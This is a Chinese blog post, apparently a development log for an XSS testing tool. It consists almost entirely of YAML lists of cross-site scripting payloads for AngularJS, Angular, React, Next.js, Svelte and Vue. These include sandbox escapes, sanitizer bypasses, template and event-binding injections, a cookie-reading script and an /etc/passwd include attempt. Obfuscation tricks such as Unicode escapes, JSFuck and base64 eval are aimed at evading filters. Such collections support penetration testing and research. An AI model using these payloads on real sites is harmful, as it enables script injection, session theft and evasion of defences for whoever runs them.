HrBeyondXSS开发记录(1)——前端框架payload

2025-03-25 23 0

Angular Payload

angularjs:
  # AngularJS 沙箱逃逸技术
  sandbox_escape:
    - "{{constructor.constructor('alert(1)')()}}"
    - "{{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value, 'alert(1)' )() }}"
    - "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].__proto__,a).value, 'alert(1)')()}}"

  # 危险方法调用
  unsafe_methods:
    - "$eval('alert(1)')"
    - "$evalAsync('alert(1)')"
    - "$apply('alert(1)')"

  # 过滤器滥用
  filter_exploit:
    - "{{'a'|orderBy:'alert(1)'}}"
    - "{{'a'| filter: 'x=alert(1)'}}"

angular:
  # 安全上下文绕过
  sanitizer_bypass:
    - "bypassSecurityTrustHtml('<img src=x onerror=alert(1)>')"
    - "bypassSecurityTrustScript('alert(1)')"
    - "bypassSecurityTrustUrl('javascript:alert(1)')"

  # 模板注入
  template_injection:
    - "<div [innerHTML]='${payload}'></div>"
    - "<div innerHTML='{{ ${payload} }}'></div>"
    - "<script type='text/ng-template'>${payload}</script>"

  # Zone.js 相关漏洞
  zone_js_exploits:
    - "Zone.current.fork({}).run(() => { ${payload} })"
    - "NgZone.runOutsideAngular(() => { ${payload} })"

  # 服务端渲染 (SSR) 攻击
  ssr_attack:
    - "</xmp><script>alert(1)</script>"
    - "<div>{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1') }}</div>"

  # 属性绑定攻击
  attribute_binding:
    - "<a [attr.href]='${payload}'>click</a>"
    - "<img [attr.src]='${payload}'>"

  # 事件绑定攻击
  event_binding:
    - "<button (click)='${payload}'>"
    - "<div (mouseover)='${payload}'>"

  # 现代漏洞模式 (Angular 12+)
  modern_exploits:
    - "{{ $any({}).constructor.constructor('alert(1)')() }}"
    - "<iframe [srcdoc]='${payload}'></iframe>"
    - "<object [data]='${payload}'></object>"

  # 依赖注入滥用
  dependency_injection:
    - "constructor(private sanitizer: DomSanitizer) { sanitizer.bypassSecurityTrustHtml(${payload}) }"
    - "@Injectable({ providedIn: 'root' }) class ExploitService { constructor() { ${payload} }"

  # 服务端模板注入
  ssti:
    - "{{ 7 * 7 }}<%= 7 * 7 %>"
    - "{{ config.__proto__.ENV = {}; ${payload} }}"

# 编码混淆策略
encoding_strategies:
  angular_specific:
    # 模板表达式混淆
    - "{{ 'a'.constructor.prototype.charAt=[].join; $eval('x=${payload}') }}"
    
    # Unicode 转义
    - "\u007B\u007B alert(1) \u007D\u007D"  # {{ alert(1) }}
    
    # 字符插入混淆
    - "{{ 'a'|orderBy:'al'%2b'ert(1)' }}"
    
    # 混合编码
    - "<div [innerHTML]='${payload|base64}'></div>"

# 上下文敏感检测规则
context_rules:
  template_expression:
    detection_patterns:
      - "\\{\\{.*\\}\\}"
      - "\\[\\(].*="
    injection_points:
      - "innerHTML"
      - "href"
      - "style"

  security_sensitive:
    dangerous_methods:
      - "bypassSecurityTrust"
      - "renderer2.createElement"
      - "ElementRef.nativeElement"

# 版本特征检测
version_detection:
  angularjs_signatures:
    - "ng-app"
    - "data-ng-"
    - "ng-controller"
  
  angular_signatures:
    - "platformBrowserDynamic"
    - "@Component"
    - "CommonModule"
  
  version_patterns:
    - "X-Powered-By: Angular"
    - /angular\/(\d+\.\d+\.\d+)/

React Payload

react_class:
  # 类组件漏洞模式
  dangerously_set_innerhtml:
    - "{ __html: '<img src=x onerror=${payload}>' }"
    - "{ __html: '<svg onload=${payload}>' }"
    - "{ __html: '<iframe srcdoc=\"${payload}\">' }"

  lifecycle_injection:
    - "componentDidMount() { ${payload} }"
    - "UNSAFE_componentWillReceiveProps() { ${payload} }"

  ref_manipulation:
    - "this.myRef.current.innerHTML = ${payload}"
    - "ReactDOM.findDOMNode(this).innerHTML = ${payload}"

react_hooks:
  # 函数组件 Hooks 利用
  useEffect_exploit:
    - "useEffect(() => { ${payload} }, [])"
    - "useLayoutEffect(() => { ${payload} }, [])"

  useRef_dom_injection:
    - "const ref = useRef(); ref.current.innerHTML = ${payload}"
    - "useImperativeHandle(ref, () => ({ exec: () => ${payload} }))"

  state_callback:
    - "setState(() => { ${payload} })"
    - "useState(() => { ${payload} })"

jsx_injection:
  # JSX 表达式注入点
  expression_escape:
    - "{${payload}}"
    - "{JSON.stringify({ data: ${payload} })}"

  attribute_injection:
    - "style={{ color: ${payload} }}"
    - "className={${payload}}"
    - "data-payload={${payload}}"

  spread_operator:
    - "{...${payload}}"
    - "<div {...${payload}} />"

nextjs:
  # Next.js 特定漏洞
  server_components:
    - "'use client'; ${payload}"
    - "export default function Page() { return (${payload}) }"

  getServerSideProps:
    - "export async function getServerSideProps() { ${payload} }"
    - "export const getStaticProps = () => { ${payload} }"

  edge_runtime:
    - "export const config = { runtime: 'edge' }; ${payload}"

advanced:
  # 高阶绕过技术
  prototype_pollution:
    - "Object.prototype.innerHTML = ${payload}"
    - "this.__proto__.render = () => ${payload}"

  jsx_function_exec:
    - "{(_ => ${payload})()}"
    - "{(() => ${payload})()}"

  unicode_smuggling:
    - "{\\u0061lert(1)}"
    - "{['\\x61\\x6c\\x65\\x72\\x74'](1)}"

  jsfuck_encoded:
    - "{(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]}"

legacy:
  # 旧版本 React 漏洞
  string_refs:
    - "ref='${payload}'"
    - "this.refs.${payload}.innerHTML = ''"

  react_create_element:
    - "React.createElement('div', { dangerouslySetInnerHTML: { __html: ${payload} }})"
    - "ReactDOM.render(${payload}, document.body)"

# 混合攻击向量
polyglot:
  hybrid_vectors:
    - "');alert(1);('"  # 闭合原有表达式
    - "${payload} || alert(1)"
    - "typeof ${payload} === 'function' && ${payload}()"

Svelte Payload

svelte3:
  # 模板注入攻击向量
  template_injection:
    - "{@html '<img src=x onerror=alert(1)>'}"
    - "{@html decodeURIComponent('%3Cscript%3Ealert(1)%3C/script%3E')}"
    - "<div>{@html unsafeVariable}</div>"

  # 事件处理器利用
  event_handlers:
    - "on:click={() => alert(1)}"
    - "on:mouseover={e => prompt(1)}"
    - "on:load={event => new Function('alert(1)')()}"

  # 属性绑定绕过
  attribute_binding:
    - "<a href={javascript:alert(1)}>click</a>"
    - "<iframe srcdoc={unescapedHTML}>"
    - "<div bind:innerHTML={maliciousContent}></div>"

  # 动态组件利用
  dynamic_components:
    - "<svelte:component this={componentWithXSS}/>"
    - "<svelte:window on:keydown={handleKey}/>"
    - "<svelte:body on:click={executePayload}/>"

  # Store 存储系统利用
  store_exploits:
    - "$store.subscribe(value => eval(value))"
    - "writable('alert(1)').update(v => eval(v))"
    - "derived(stores, values => new Function(values))"

svelte4:
  # 新版本特性利用
  reactivity_bypass:
    - "$effect(() => { ${payload} })"
    - "$derived(() => { eval(inputValue) })"
    - "<script rune> let { pwn = alert(1) } = $props() </script>"

  # 服务端渲染 (SSR) 攻击
  ssr_vectors:
    - "{@html '<%%>'}<!--#include virtual=\"/etc/passwd\"-->"
    - "<div data-sveltekit-fetched='javascript:alert(1)'></div>"
    - "<svelte:head><!--{ '-->' + payload + '<!--' }--></svelte:head>"

  # 编译时特性利用
  compile_time:
    - "<script context='module'>window.__payload = 'alert(1)'</script>"
    - "<!--svelte-ignore a11y-click-events-have-key-events-->"
    - "<div on:click={unsafeHandler}></div>"

# 通用绕过技术
common:
  # 编码混淆技术
  encoded_payloads:
    - "JaVaScRiPt:alert(1)"
    - "data:text/html;charset=utf-8,<script>parent.alert(1)</script>"
    - "javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"

  # DOM 破坏技术
  dom_manipulation:
    - "<script>document.currentScript.parentElement.innerHTML = '<img src=x onerror=alert(1)>'</script>"
    - "<svelte:self let:props><script>props.execute()</script></svelte:self>"

  # 异步执行技术
  async_execution:
    - "setTimeout(() => alert(1), 500)"
    - "requestIdleCallback(() => { ${payload} })"
    - "new SharedWorker('data:application/javascript,alert(1)')"

# 上下文敏感 Payload
context_sensitive:
  html_element:
    - "<script>console.log`${document.cookie}`</script>"
    - "<style>@import url(javascript:alert(1));</style>"

  attribute_context:
    - "javascript:import('data:text/javascript,alert(1)')"
    - "data:text/svelte,<svelte:options accessors/><script>export let pwn=alert(1);</script>"

  template_literals:
    - "`${alert(1)}`"
    - "new Function`alert\\x28document.domain\\x29`" 

# 高级混淆技术
advanced_obfuscation:
  unicode_smuggling:
    - "\u0061\u006c\u0065\u0072\u0074(1)"
    - "<\u0073cript>alert(1)</script>"

  comment_bypass:
    - "<!-- --><script>alert(1)</script><!-- -->"
    - "/**/eval/**/(atob('YWxlcnQoMSk='))/**/"

  chunked_encoding:
    - "<scri%0apt>aler%0at(1)</script>"
    - "<svelte%3Acomponent this=window['al'+'ert']/>"
Vue Payload
vue2:
  template_injection:
    - "{{ _c.escape(_s(${payload})) }}"                 # 转义函数绕过
    - "{{ constructor.constructor('alert(1)')() }}"      # 构造器链利用
    - "{{ _vm.$options.methods.__proto__.x = ${payload} }}" # 原型污染

  directives:
    v_html:
      - "<div v-html='_c.escape(_s(${payload}))'></div>"  # v-html 指令绕过
      - "<component :is='${payload}'></component>"        # 动态组件注入
    
    v_bind:
      - ":href='javascript:alert(1)'"                     # JavaScript协议绑定
      - ":style='{color: ${payload}}'"                    # CSS注入
      
  event_handlers:
    - "@click='${payload}'"                              # 点击事件注入
    - "@mouseover=\"${payload}\""                        # 带引号的事件处理
    - "v-on:focus='new Function(${payload})'"            # 动态函数构造

  filter_exploits:
    - "{{ 'alert(1)' | filterFunction }}"                # 过滤器参数注入
    - "{{ _vm.$options.filters.__proto__.x = ${payload} }}" # 过滤器原型污染

  ssr:
    - "{{#with this}}<script>${payload}</script>{{/with}}" # Mustache 模板注入
    - "<% ${payload} %>"                                  # 服务端模板注入

vue3:
  composition_api:
    setup_script:
      - "<script setup>${payload}</script>"              # Setup语法糖注入
      - "const exploit = () => eval(${payload})"         # 箭头函数利用
    
    reactivity:
      - "ref(${payload})"                                # 响应式对象注入
      - "window.__vue_app__.config.globalProperties.${payload}" # 全局属性污染

  renderer:
    - "createRenderer({ patchProp: ${payload} })"        # 渲染器函数劫持
    - "h('div', { innerHTML: ${payload} })"              # VNode注入

  modern_features:
    suspense:
      - "<Suspense><template #default>${payload}</template></Suspense>"
    
    teleport:
      - "<Teleport to='body'>${payload}</Teleport>"

  ecosystem:
    vue_router:
      - "router.beforeEach((${payload}) => {})"           # 路由守卫注入
      - "this.$router.addRoutes([{ component: ${payload} }])"
    
    vuex:
      - "store.subscribeAction({ after: ${payload} })"    # Action订阅攻击
      - "this.$store._modules.root._rawModule.actions = ${payload}"

advanced_obfuscation:
  unicode_escape:
    - "\\u0061\\u006c\\u0065\\u0072\\u0074(1)"           # alert的Unicode转义
    - "\\x61\\x6c\\x65\\x72\\x74(1)"                     # Hex转义
  
  string_concat:
    - "aler" + "t(1)"
    - "window['al' + 'ert'](1)"
  
  template_literals:
    - "alert`1`"
    - "window[`al${'ert'}`](1)"

dependency_injection:
  provide_inject:
    - "provide('xss', ${payload})"                       # Provide漏洞
    - "inject('xss')"                                    # Inject触发

  plugin_abuse:
    - "app.use({ install: ${payload} })"                 # 插件安装攻击
    - "app.mixin({ created: ${payload} })"               # 全局混入

server_side:
  nuxt_ssr:
    - "<%= ${payload} %>"                                # Nuxt服务端模板
    - "useAsyncData(() => ${payload})"                   # 异步数据注入
  
  vuepress:
    - "{{ $page.${payload} }}"                           # 主题变量注入
    - "<ClientOnly>${payload}</ClientOnly>"              # 客户端注入点

defense_evasion:
  sanitizer_bypass:
    - "{{ decodeURIComponent(${payload}) }}"             # 解码函数绕过
    - "<div v-html='bypassSanitization(${payload})'></div>"
  
  sandbox_escape:
    - "with(this){${payload}}"                           # with语句逃逸
    - "Object.defineProperty(this, 'x', { value: ${payload} })"

最近时间安排比较紧张,整合了各种框架的payload。


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

AI Agent:功能、架构与安全风险
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
DrayTek再现未授权RCE漏洞:CVE-2024-12987复现分析
Mozilla紧急修复Firefox高危漏洞 与Chrome零日漏洞原理相似
数据跨境 | 韩国数据安全与跨境合规实践
Mage-AI 不安全的默认身份验证设置导致0day远程命令执行漏洞(CVE-2025-2129)

发布评论